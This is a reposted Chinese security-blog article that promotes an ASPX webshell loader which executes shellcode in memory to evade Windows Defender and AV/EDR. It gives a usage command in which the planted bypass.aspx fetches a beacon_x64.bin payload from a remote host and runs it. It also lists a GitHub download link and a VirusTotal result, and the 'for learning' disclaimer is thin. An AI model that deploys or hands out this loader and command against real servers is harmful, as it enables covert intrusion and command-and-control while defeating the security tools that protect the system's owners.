ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

admin 2023年12月18日08:58:25评论32 views字数 638阅读2分7秒阅读模式
免责声明

由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把夜组安全设为星标”,否则可能就看不到了啦!

ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
安全工具
ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

01

工具介绍

ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
  • ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

  • 这只是个代码例子,目的是为了学习

  • 部分杀软(AV/EDR)可能需要你的Bin能够做到内存免杀

  • 持续更新中,包括后续的JSP内存加载

02

工具使用
将shellcode远程托管到任意网站(URLB)
http://URLA/bypass.aspx?shellcodeURL=http://URLB/beacon_x64.bin

VT效果: https://www.virustotal.com/gui/file/b016e15e7cf0d737580474703cbf351eec956b870c2ad39e43beb3fa6422d5e3?nocache=1

ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

03 工具下载

https://github.com/INotGreen/Webshell-loader

原文始发于微信公众号(夜组安全):ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月18日08:58:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)http://cn-sec.com/archives/2311451.html

发表评论

匿名网友 填写信息